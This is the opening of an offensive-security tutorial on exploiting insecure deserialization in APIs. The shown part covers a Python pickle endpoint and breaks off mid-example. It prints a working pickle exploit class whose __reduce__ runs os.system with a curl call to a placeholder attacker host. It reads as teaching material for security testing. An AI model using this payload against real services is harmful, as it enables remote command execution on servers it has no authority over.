Hacking APIs: Exploit Insecure Deserialization

Insecure Deserialization is a serious vulnerability that occurs when an API receives serialized data and deserializes it without verifying its content. If not handled securely, attackers can inject objects that execute code, change logic, or manipulate data.

This guide will walk you through three exploitation scenarios: one with Python, one with Java, and another with Node.js — all with real HTTP requests and server responses.

Python (Pickle-base API)

POST /api/v1/profile/upload_data

The frontend uploads profile data encoded in base64 (Pickle format).

Normal Request

POST /api/v1/profile/upload_data
Authorization: Bearer eyJhbGciOiJIUzI1Ni...
Content-Type: application/json

{
  "data": "gASVJgAAAAAAAAB9lCiMB3VzZXJfaWSUjAMxMjOlLg=="
}

Decoded from base64, this is a pickle.dumps({"user_id": "123"}).

Normal Response

{
  "message": "User data loaded successfully",
  "user_id": "123"
}

Exploit: Remote Command Execution

import pickle, os, base64

class Exploit:
    def __reduce__(self):
        return (os.system, ("curl http://attacker.tld?owned=1",))

payload = base64.b64encode(pickle.dumps(Exploit()))…